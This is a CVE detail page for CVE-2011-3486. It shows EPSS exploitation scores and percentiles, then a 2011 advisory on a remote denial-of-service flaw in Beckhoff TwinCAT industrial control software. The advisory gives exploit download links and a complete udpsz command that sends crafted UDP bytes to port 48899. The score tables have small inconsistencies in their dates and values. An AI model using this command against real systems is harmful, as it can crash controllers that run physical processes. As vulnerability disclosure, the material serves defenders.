CVE-2011-3486 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	67.29%	–	–
2022-03-06	–	–	65.92%	–	–
2023-03-12	–	–	–	15.47%	–
2023-04-16	–	–	–	21.24%	–
2023-06-18	–	–	–	32.55%	–
2023-10-08	–	–	–	43.82%	–
2023-12-03	–	–	–	46.13%	–
2024-01-28	–	–	–	54.67%	–
2024-02-11	–	–	–	54.67%	–
2024-03-17	–	–	–	66.9%	–
2024-06-02	–	–	–	70.1%	–
2024-06-30	–	–	–	64.47%	–
2024-08-25	–	–	–	63.49%	–
2024-10-06	–	–	–	71.5%	–
2024-11-17	–	–	–	77.01%	–
2024-12-22	–	–	–	84.74%	–
2025-01-05	–	–	–	86.27%	–
2025-02-16	–	–	–	83.89%	–
2025-01-19	–	–	–	86.27%	–
2025-02-16	–	–	–	83.89%	–
2025-03-18	–	–	–	–	59.46%
2025-03-30	–	–	–	–	61.66%
2025-03-30	–	–	–	–	61.66,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	99%
2022-03-06	99%
2023-03-12	95%
2023-04-16	96%
2023-06-18	96%
2023-10-08	97%
2023-12-03	97%
2024-01-28	97%
2024-02-11	98%
2024-03-17	98%
2024-06-02	98%
2024-06-30	98%
2024-08-25	98%
2024-10-06	98%
2024-11-17	98%
2024-12-22	99%
2025-01-05	99%
2025-02-16	99%
2025-01-19	99%
2025-02-16	99%
2025-03-18	98%
2025-03-30	98%
2025-03-30	98%

####################################################################### Luigi Auriemma Application: Beckhoff TwinCAT http://www.beckhoff.de/twincat/ Versions: <= 2.11.0.2004 Platforms: Windows Bug: Denial of Service Exploitation: remote Date: 13 Sep 2011 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== From vendor's website: "The Beckhoff TwinCAT software system turns almost any compatible PC into a real-time controller with a multi-PLC system, NC axis control, programming environment and operating station." ####################################################################### ====== 2) Bug ====== Denial of Service caused by an invalid read access. ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/udpsz.zip https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15707.zip udpsz -C "03 66 14 71 00 00 00 00 06 00 00 00 0a ff ff 02 01 01 10 27" -b 0xff SERVER 48899 0x5fe ####################################################################### ====== 4) Fix ====== No fix. #######################################################################